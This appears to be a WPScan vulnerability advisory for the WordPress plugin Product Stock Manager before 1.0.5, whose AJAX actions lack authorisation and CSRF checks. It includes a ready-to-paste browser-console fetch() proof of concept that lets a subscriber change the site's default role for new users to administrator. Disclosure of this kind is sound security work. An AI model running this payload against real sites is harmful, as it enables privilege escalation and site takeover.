WordPress Plugin Vulnerabilities
Product Stock Manager < 1.0.5 - Subscriber+ Unauthorised AJAX Calls
Description
The plugin does not have authorisation and proper CSRF checks in multiple AJAX actions, allowing users with a role as low as subscriber to call them. One action in particular could allow to update arbitrary options
Proof of Concept
To set the default role for new users to administrator, run the below command in the developer console of the web browser while being logged on the blog as a subscriber user fetch("/wp-admin/admin-ajax.php", { "headers": { "content-type": "application/x-www-form-urlencoded", }, "method": "POST", "body": 'action=af_sm_set_checkbox_status&name=default_role&checkbox_status=administrator', "credentials": "include" }).then(response => response.text()) .then(data => console.log(data));
Affects Plugins
References
CVE
Classification
Type
NO AUTHORISATION
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
WPScan
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-10-17 (about 1 years ago)
Added
2022-10-17 (about 1 years ago)
Last Updated
2022-10-17 (about 1 years ago)